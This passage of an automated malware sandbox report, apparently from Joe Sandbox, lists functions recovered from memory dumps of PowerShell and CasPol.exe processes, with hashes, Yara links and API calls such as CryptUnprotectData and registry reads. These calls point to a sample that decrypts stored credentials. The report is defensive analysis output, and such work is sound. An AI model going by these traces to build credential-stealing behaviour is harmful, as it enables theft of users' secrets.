Instruction Fuzzy Hash: E04218707813109FFB59AB348C11B6E76A3ABC5704F64887D9506AF3D4DFBA9882CB41

Uniqueness

Uniqueness Score: -1.00%

Function 088E91A8 Relevance: .7, Instructions: 710COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2193250369.00000000088E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_88e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e44e250a07c232773a10b918d3e5c2980dbbb7edd6b61986ea8a535db2be431
Instruction ID: 2570ee95e1001777acec55ad596948af152be3b6b5d6dc513fa3e69f3e58ed8f
Opcode Fuzzy Hash: 5e44e250a07c232773a10b918d3e5c2980dbbb7edd6b61986ea8a535db2be431
Instruction Fuzzy Hash: E8423C70B413109FEB29EB348C55B6E77A3AF85704F2484ADD506AF3D0DBBA9842CB45

Uniqueness

Uniqueness Score: -1.00%

Function 088E6A60 Relevance: .6, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2193250369.00000000088E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_88e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 046ae8a2545332013095d18c01f3be4e70330b9111e7d4978e114d9241b23cf2
Instruction ID: 8b0c58b9fad3dccb34cba71702a9cc5409eb5cce7de0fc0b71b9cf6a4625ad11
Opcode Fuzzy Hash: 046ae8a2545332013095d18c01f3be4e70330b9111e7d4978e114d9241b23cf2
Instruction Fuzzy Hash: 25320B70B41304DFEB29EB748C15B6E77A3AB85704F2484BDD506AF390DB7A9882CB45

Uniqueness

Uniqueness Score: -1.00%

Function 088E9BC8 Relevance: .6, Instructions: 599COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2193250369.00000000088E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_88e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11ab6b6600cea8e80b520d53a4eb779222741b52d94038b84c41bd17c4e62362
Instruction ID: 46877056f535b295fdd5ee3c4848ab292b0454067bf935c7912021b00622a2c2
Opcode Fuzzy Hash: 11ab6b6600cea8e80b520d53a4eb779222741b52d94038b84c41bd17c4e62362
Instruction Fuzzy Hash: E4223E70B413009FEB29EB348C55B6E77A3AB85704F2484ADD506AF3D0DBBAD842CB45

Uniqueness

Uniqueness Score: -1.00%

Function 088EB1A0 Relevance: .6, Instructions: 595COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2193250369.00000000088E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_88e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c4a8a6cf295e7209b93a80b770eaa606def540bea2833683f3b96eac7286225
Instruction ID: 177543343cfb0f08fae2be9d366e8de9438569d5bac004f8ee5216eb067be3e8
Opcode Fuzzy Hash: 8c4a8a6cf295e7209b93a80b770eaa606def540bea2833683f3b96eac7286225
Instruction Fuzzy Hash: DF222A70B413009FEB29EB748C55B6E77A3AB85704F2484ADD506AF3D0DBBAD842CB45

Uniqueness

Uniqueness Score: -1.00%

Function 088EA960 Relevance: .6, Instructions: 595COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2193250369.00000000088E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_88e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4312b5a7f54f7d5a49e48c5af0f14daa95625d21dfdbd3dbfe9cad346f664db1
Instruction ID: edf93b55ce48d6e66e4ad8534a5603e22727ed720791b5b3b9720b341915ee4b
Opcode Fuzzy Hash: 4312b5a7f54f7d5a49e48c5af0f14daa95625d21dfdbd3dbfe9cad346f664db1
Instruction Fuzzy Hash: 1F224C70B413049FEB29EB348C51B6E77A3AB85704F2484ADD506AF3D0DBBAD842CB45

Uniqueness

Uniqueness Score: -1.00%

Function 08B6E940 Relevance: .5, Instructions: 507COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2195205659.0000000008B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_8b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57458e06f3acc36fead1c502d43d2a18b2cebcea0068fdef4350e9d9324423ff
Instruction ID: fa7f339e10739406782bf570f5b3efcd98d21d74339e61b617879a515d7da380
Opcode Fuzzy Hash: 57458e06f3acc36fead1c502d43d2a18b2cebcea0068fdef4350e9d9324423ff
Instruction Fuzzy Hash: 52129C34A007058FDB14DFB5C84469EBBF2FFC8308B148969D8069B764EB78E946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 089552B0 Relevance: .5, Instructions: 496COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2194657410.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_8950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98732b420070bded74758e4f381399f4eb18bf11b2fe339c8725487ab045c930
Instruction ID: 71227a241a96749091eb8a27bd141b676049cbc2e219a89afd52b679891950ce
Opcode Fuzzy Hash: 98732b420070bded74758e4f381399f4eb18bf11b2fe339c8725487ab045c930
Instruction Fuzzy Hash: DE22FA74A042588FDB54DBF4C8547DE77B2FF84308F1189B8C01AAB654EB396E818F91

Uniqueness

Uniqueness Score: -1.00%

Function 089552C0 Relevance: .5, Instructions: 491COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2194657410.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_8950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b9116e8d1c01a6d288c292c9f1c3f01590c5c1ebbae2a21ac643edc637ffd4
Instruction ID: 4cda47b43b6d15a7ab3d05fab6535fae79a2e07237d903012a6cae097568cdd8
Opcode Fuzzy Hash: 02b9116e8d1c01a6d288c292c9f1c3f01590c5c1ebbae2a21ac643edc637ffd4
Instruction Fuzzy Hash: 9C22EA74A042588FDB54EBF4C8547DE77B2FF84308F1189B8D01AAB654EB396E818F91

Uniqueness

Uniqueness Score: -1.00%

Function 08B6D6E8 Relevance: .4, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2195205659.0000000008B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_8b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72828c54a1e1452256017952bda65c9502eb5a25d0a9a61c74832f3003be6e36
Instruction ID: 6bd640e4320c62d410ea995fad6402e079a325ce58e0f15b1962ea1593ca240d
Opcode Fuzzy Hash: 72828c54a1e1452256017952bda65c9502eb5a25d0a9a61c74832f3003be6e36
Instruction Fuzzy Hash: E1F18E34B046058FCB04DFB8C884AAE77F6EF89314B0889A9D406DB765DB35ED42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 08C6AA00 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2196322761.0000000008C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_8c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35e98d792eba1671b7a2a765bd0bf4eeb3a9a6086ee87817470e1311cf99c103
Instruction ID: f2da9aabe5a3da5e2c06c3e6fd373fb8212456a0184f3449b817804cd2810f43
Opcode Fuzzy Hash: 35e98d792eba1671b7a2a765bd0bf4eeb3a9a6086ee87817470e1311cf99c103
Instruction Fuzzy Hash: 3EE1C034A002189FDB15DFA5D898BAEBBF6EF89315F04846DE906EB390CB349D41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 088E64F8 Relevance: .4, Instructions: 359COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2193250369.00000000088E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_88e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515886aa37c006c5f33b8c5c4bb1ed8634ff7bcc2d6d3cf716ea8f8d3e1af8e9
Instruction ID: 2097b89ae9e8c08cac4bd8f0165dcb2ce78de25f2c3afc98d1219a33192923dd
Opcode Fuzzy Hash: 515886aa37c006c5f33b8c5c4bb1ed8634ff7bcc2d6d3cf716ea8f8d3e1af8e9
Instruction Fuzzy Hash: 79B127707813009FEB29AB348C55B6E36A39B86714F2489BDD506AF3D1DFBADC428741

Uniqueness

Uniqueness Score: -1.00%

Function 088C2AC8 Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2192280257.00000000088C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_88c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3d6a638285b5c7a5cd071fa1ba9d280f80e44c7ac479f281d2c671767fd12e
Instruction ID: 81b3bede013ce0e7924009b2d4925208a46a3d60181c1bcf74babbbc7183e220
Opcode Fuzzy Hash: 7c3d6a638285b5c7a5cd071fa1ba9d280f80e44c7ac479f281d2c671767fd12e
Instruction Fuzzy Hash: 61C18F343C53506FF729AB30BC62B3A3673ABC1B04F24856DA7015F2D1DAB6A842C795

Uniqueness

Uniqueness Score: -1.00%

Function 088C2AD8 Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2192280257.00000000088C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_88c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d9ebb23601f7106ee7822751e3e33cc52e8f461ae463c8032c450fc1e1a20d
Instruction ID: ef3f9be4bdd6d2d68581e80ea3f9e57aa53652dea8e4e973a0424aad2fe410e7
Opcode Fuzzy Hash: 31d9ebb23601f7106ee7822751e3e33cc52e8f461ae463c8032c450fc1e1a20d
Instruction Fuzzy Hash: 00C190343C53506FF729AB30BC62B3A3663ABC1B04F24856DA7015F3D1DAB6A852C785

Uniqueness

Uniqueness Score: -1.00%

Function 08D128C0 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2201430501.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_8d10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 419823dc4f4346483435851feacaee2ba73c277bb0263d73183531013579a727
Instruction ID: 140e0d3af76e78bf4a5753ddf2701c464bc8bc4f08e52dd60e3c3cd185933496
Opcode Fuzzy Hash: 419823dc4f4346483435851feacaee2ba73c277bb0263d73183531013579a727
Instruction Fuzzy Hash: 3A81E330B083459FDF18CFA9D9907AEBBB2AF84345F10812DE9469B359EB75D942CB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 6564, Parent PID: 9092COMMON

Execution Graph

Execution Coverage:	17.1%
Dynamic/Decrypted Code Coverage:	99.2%
Signature Coverage:	0.8%
Total number of Nodes:	240
Total number of Limit Nodes:	5

Executed Functions

Function 20B00040 Relevance: 1.6, APIs: 1, Instructions: 148
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 20B000A1

Memory Dump Source

Source File: 0000001A.00000002.5808148045.0000000020B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 20B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_20b00000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6a0d944aa487922fa01b981d1a157949e391feb8a4d14a499d8aaa9dba1b430c
Instruction ID: 3e2f0d1b8fd5ac8d365cd7df7c7629f2c0f2f9eb97fc41c303f36ac9bd123ee5
Opcode Fuzzy Hash: 6a0d944aa487922fa01b981d1a157949e391feb8a4d14a499d8aaa9dba1b430c
Instruction Fuzzy Hash: C8518F35A142059BCB04DFF4C894AAEB7B6BF88304F158929E6039B391EF30E9448B52

Uniqueness

Uniqueness Score: -1.00%

Function 20C286AB Relevance: 1.6, APIs: 1, Instructions: 54encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 20C28715

Memory Dump Source

Source File: 0000001A.00000002.5809763241.0000000020C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 20C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_20c20000_CasPol.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: dc932d14e9f56f6fa5a42e6e0a76fedfe367c578a4735222d61631c582fdd195
Instruction ID: ab5eb60cfd264fc44a914c5c91e83334d150983a1fe165e21b6717e0c33aa20e
Opcode Fuzzy Hash: dc932d14e9f56f6fa5a42e6e0a76fedfe367c578a4735222d61631c582fdd195
Instruction Fuzzy Hash: B11167B68042499FCF10CFA9D840BEEBFF4EF48320F148859E564A7651C378A994DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 20C286B0 Relevance: 1.6, APIs: 1, Instructions: 52encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 20C28715

Memory Dump Source

Source File: 0000001A.00000002.5809763241.0000000020C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 20C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_20c20000_CasPol.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 1364004e90c86f1af280be48fc35e9c5bd2131b8558d0920c5c0d3ae04bb2f22
Instruction ID: 5994486de28d17b41560629fd8b438db0417458d9bcbb977ce22ccb51629b04b
Opcode Fuzzy Hash: 1364004e90c86f1af280be48fc35e9c5bd2131b8558d0920c5c0d3ae04bb2f22
Instruction Fuzzy Hash: B11104B68006499FCF10CF99D844BDEBBF4EF48320F148819E518A7650D779A994DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1DAD0C40 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.5753097145.000000001DAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1dad0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f57f5b0e6a68005f27aab4cc8c202ee00219c34b65b410ec21e3bbf845de2c1
Instruction ID: 6ff43f9cf085747cb6be1092868b8023705b68837b7b5ad615eb83cf92e536af
Opcode Fuzzy Hash: 6f57f5b0e6a68005f27aab4cc8c202ee00219c34b65b410ec21e3bbf845de2c1
Instruction Fuzzy Hash: 4CD012750052908FD741AB78C65DA853F79F95234630605D6D04BC7163DB200948C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 1DADEA04 Relevance: 1.8, APIs: 1, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 1DADEB98

Memory Dump Source

Source File: 0000001A.00000002.5753097145.000000001DAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1dad0000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4cdc1ec08ec4422a4044e79fbe253cb57d98298fdb6b588195ee152dc0beff02
Instruction ID: eb13a7d04365d66b0e5da6f3c5ff0cb27da01ab4834e3e1f249f4519235ee976
Opcode Fuzzy Hash: 4cdc1ec08ec4422a4044e79fbe253cb57d98298fdb6b588195ee152dc0beff02
Instruction Fuzzy Hash: 6C028438945728CFCBA5DF64C88869DB7B6BF49315F1181E9C90A93354CB329E82CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1DADEA1B Relevance: 1.8, APIs: 1, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 1DADEB98

Memory Dump Source

Source File: 0000001A.00000002.5753097145.000000001DAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1dad0000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 37be1d16804e299e5c582180684139aa95adb00afb2121a3ab2cebf6d08008a3
Instruction ID: 74795baf180c49fd868cae6200c675d117cd4c1c584f9b59f3f6d69d14ea9f73
Opcode Fuzzy Hash: 37be1d16804e299e5c582180684139aa95adb00afb2121a3ab2cebf6d08008a3
Instruction Fuzzy Hash: 09027438945728CFCBA5DF64C88869DB7B6BF49315F1181E9D90A93254CB329E82CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1DADEA4D Relevance: 1.8, APIs: 1, Instructions: 341
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 1DADEB98

Memory Dump Source

Source File: 0000001A.00000002.5753097145.000000001DAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1dad0000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: edb19f6eb34b0e25e7317d329c15277f81154a550a4087c354b8318c0d227448
Instruction ID: d96994debf4c215e3489626625d5ad176630195ecf00f9feb66b69d3d5ab924c
Opcode Fuzzy Hash: edb19f6eb34b0e25e7317d329c15277f81154a550a4087c354b8318c0d227448
Instruction Fuzzy Hash: 78028538945728CFCBA5DF64C88869DB7B6BF49315F1181E9D90AA3354CB325E82CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1DADEA88 Relevance: 1.8, APIs: 1, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 1DADEB98

Memory Dump Source

Source File: 0000001A.00000002.5753097145.000000001DAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1dad0000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 069458e4cfd942e382f67a584b2b81368c7906a7f77d6de6b629b296af0a6be7
Instruction ID: 9842bd0efe497baa72a9b29207a8911300c12c0ddec4b421bf2ae6d4aeaf17d3
Opcode Fuzzy Hash: 069458e4cfd942e382f67a584b2b81368c7906a7f77d6de6b629b296af0a6be7
Instruction Fuzzy Hash: D3028438945728CFCBA5DF64C88869DB7B6BF49315F1141E9D90AA3354CB329E82CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1DADEAC3 Relevance: 1.8, APIs: 1, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 1DADEB98

Memory Dump Source

Source File: 0000001A.00000002.5753097145.000000001DAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1dad0000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c8b58ac06077deab2dd8e975d6b9e163e86b17f4512809365e935acf0b8104bc
Instruction ID: a0c8aa7dd6d76bb908d550dae53915ef8b88dfaedce60b37bd754ad626df4f91
Opcode Fuzzy Hash: c8b58ac06077deab2dd8e975d6b9e163e86b17f4512809365e935acf0b8104bc
Instruction Fuzzy Hash: 58027538945728CFCBA5DF64C88869DB7B6BF49315F1181E9C90AA3354CB325E82CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1DADEAFE Relevance: 1.8, APIs: 1, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 1DADEB98

Memory Dump Source

Source File: 0000001A.00000002.5753097145.000000001DAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1dad0000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c781fba42cf33760febc0781863dad59655a658ef3b2a428182ae1433901b7c3
Instruction ID: 8584fd4a5d5b867e0d7ce5d0b3d7bf20a65f79bfbdc14169cbed02eee90f88bd
Opcode Fuzzy Hash: c781fba42cf33760febc0781863dad59655a658ef3b2a428182ae1433901b7c3
Instruction Fuzzy Hash: 69F17338945728CFCBA5DF64C88869DB7B6BF49315F1141E9C90AA3254CB329EC2CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1DADEB39 Relevance: 1.8, APIs: 1, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 1DADEB98

Memory Dump Source

Source File: 0000001A.00000002.5753097145.000000001DAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1dad0000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8d2800e2eac9d57020d315b8b5f983ccb943637e563e8e0ba252558ad77528dc
Instruction ID: c79f344e4f1d18dc4ab526c2b6929292f1398374ec809ec7f203c35bcf3d4616
Opcode Fuzzy Hash: 8d2800e2eac9d57020d315b8b5f983ccb943637e563e8e0ba252558ad77528dc
Instruction Fuzzy Hash: ABF17378945728CFCBA5DF64C88869DB7B6BF49315F1141E9C90AA3254CB329E82CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1DADEB74 Relevance: 1.8, APIs: 1, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 1DADEB98

Memory Dump Source

Source File: 0000001A.00000002.5753097145.000000001DAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1dad0000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 352f1e6196cd474c2587a8e7e263c8cafc4f7b8c645cf51c3ba403053e5b74be
Instruction ID: b61c4684d8ad7935c689ae05be132e7299bb6beb97a79efa26a393895e4797ae
Opcode Fuzzy Hash: 352f1e6196cd474c2587a8e7e263c8cafc4f7b8c645cf51c3ba403053e5b74be
Instruction Fuzzy Hash: 2CF17378945728CFCBA5DF64C88869DB7B6BF49315F1141E9C90AA3254CB329EC2CF42

Uniqueness

Uniqueness Score: -1.00%

Function 20B00B00 Relevance: 1.7, APIs: 1, Instructions: 185
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 20B00B41

Memory Dump Source

Source File: 0000001A.00000002.5808148045.0000000020B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 20B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_20b00000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 67af4fdd428d0cab0e770fc141f1b6f7c5dd510d05c826d0ec74e3c39349902f
Instruction ID: ccd94c2f12b55410a437b996f6749b63c37afe4d82112d41bb84363cdfd4b6a4
Opcode Fuzzy Hash: 67af4fdd428d0cab0e770fc141f1b6f7c5dd510d05c826d0ec74e3c39349902f
Instruction Fuzzy Hash: B4717B34A10219CBCB64DFF4C598BAEBBF2FF44344F118929D502A72A4DF35A941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 20B00037 Relevance: 1.6, APIs: 1, Instructions: 144
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 20B000A1

Memory Dump Source

Source File: 0000001A.00000002.5808148045.0000000020B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 20B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_20b00000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fb17f9b87f0641aa60b06767abc960664f74afc433543a13c8d676a63a88bd11
Instruction ID: 7c574f79fab2433ac0ebbf362b656faf88c522a15b72063b7cec2b01e2df4ce6
Opcode Fuzzy Hash: fb17f9b87f0641aa60b06767abc960664f74afc433543a13c8d676a63a88bd11
Instruction Fuzzy Hash: BA518135A142059FCB04DFB4C894AAEB7F6FF88314F158929E5039B391EF30E9458B52

Uniqueness

Uniqueness Score: -1.00%

Function 20B03BA8 Relevance: 1.6, APIs: 1, Instructions: 88
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 20B0DED1

Memory Dump Source

Source File: 0000001A.00000002.5808148045.0000000020B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 20B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_20b00000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 10e9d7245ad7b84b9a93ca447513c738d49e93259281be510fbc1d84a0d61393
Instruction ID: 2aaa90b8905509fdbdeacd546dd71e3afaaffff49b93a005dbdc91ff1a795e64
Opcode Fuzzy Hash: 10e9d7245ad7b84b9a93ca447513c738d49e93259281be510fbc1d84a0d61393
Instruction Fuzzy Hash: 1831E0B1D012589FCB20CFDAC884A9EBFF5BF48300F11842AE819AB350D7759945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 20B0DE13 Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 20B0DED1

Memory Dump Source

Source File: 0000001A.00000002.5808148045.0000000020B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 20B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_20b00000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 70baa012b757f45a4423fa4bb4ffc587b71affcb5b6fda0f3b0ee4e266af366d
Instruction ID: 3ab77e3bd1b09809a0ed14f695fe3ea9cf8b1646b6aa6273ca2e2e4a8699e9b6
Opcode Fuzzy Hash: 70baa012b757f45a4423fa4bb4ffc587b71affcb5b6fda0f3b0ee4e266af366d
Instruction Fuzzy Hash: DC31EEB5D012589FCB20CFE9C884ADEBFF5AF48300F15842AE819AB350C7759945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 20B03B9C Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 20B0DC14

Memory Dump Source

Source File: 0000001A.00000002.5808148045.0000000020B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 20B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_20b00000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 57e33ffc2d336e99b3202759259ee7886649f24ee212812e0020494d87abe498
Instruction ID: 6940850e410f7e19934c55b6ab2348b3f3c22b7fe47a6b3d77a9103c204c11cf
Opcode Fuzzy Hash: 57e33ffc2d336e99b3202759259ee7886649f24ee212812e0020494d87abe498
Instruction Fuzzy Hash: D531F1B0D012499FDB20CFE9C584A8EFFF5EF49304F24856AE808AB351C7B59985CB95

Uniqueness

Uniqueness Score: -1.00%

Function 20B0DB5B Relevance: 1.6, APIs: 1, Instructions: 81registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 20B0DC14

Memory Dump Source

Source File: 0000001A.00000002.5808148045.0000000020B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 20B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_20b00000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 9b9df1d8582ee6816326df970c20574f5e0de92887cc09324f7e9449285b7d07
Instruction ID: 9dfdea38021f11b2f60dd8db87833de384d932dad70fd3de2b1d9047f05a0c64
